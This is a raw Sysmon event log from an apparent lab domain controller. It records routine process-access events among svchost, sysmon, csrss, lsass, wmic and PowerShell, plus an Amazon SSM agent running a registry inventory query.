13:34:21.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002330Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002329Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:21.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002328Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002327Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:21.938{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002326Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.938{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002325Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:21.938{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002324Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.938{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002323Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:21.938{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002322Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.938{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E5D-6005-6B00-00000000A301}3940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002321Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.938{59A5CD1D-8E5B-6005-5500-00000000A301}37483704C:\Program Files\Amazon\SSM\ssm-agent-worker.exe{59A5CD1D-8E5D-6005-6B00-00000000A301}3940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\ssm-agent-worker.exe+5d9ee 154100x80000000000000002320Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:21.938{59A5CD1D-8E5D-6005-6B00-00000000A301}3940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Amazon\PVDriver'" "| Select-Object" "Name, Version" "| ConvertTo-Json -Depth 3"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{59A5CD1D-8E5B-6005-5500-00000000A301}3748C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 10341000x80000000000000002319Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.903{59A5CD1D-8E44-6005-0B00-00000000A301}8563980C:\Windows\system32\lsass.exe{59A5CD1D-8E5D-6005-6A00-00000000A301}3864C:\Windows\System32\Wbem\wmic.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002318Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:21.903{59A5CD1D-8E44-6005-0B00-00000000A301}8563980C:\Windows\system32\lsass.exe{59A5CD1D-8E5D-6005-6A00-00000000A301}3864C:\Windows\System32\Wbem\wmic.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002317Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.900{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E5D-6005-6A00-00000000A301}3864C:\Windows\System32\Wbem\wmic.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002316Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:21.893{59A5CD1D-8E5B-6005-5B00-00000000A301}39363912C:\Windows\system32\conhost.exe{59A5CD1D-8E5D-6005-6A00-00000000A301}3864C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002315Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.891{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002314Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:21.891{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002313Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.891{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002312Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:21.891{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002311Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.891{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002310Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:21.891{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002309Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.891{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002308Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:21.891{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002307Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.891{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002306Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:21.890{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E5D-6005-6A00-00000000A301}3864C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002305Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.890{59A5CD1D-8E5B-6005-5500-00000000A301}37483704C:\Program Files\Amazon\SSM\ssm-agent-worker.exe{59A5CD1D-8E5D-6005-6A00-00000000A301}3864C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\ssm-agent-worker.exe+5d9ee 154100x80000000000000002304Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 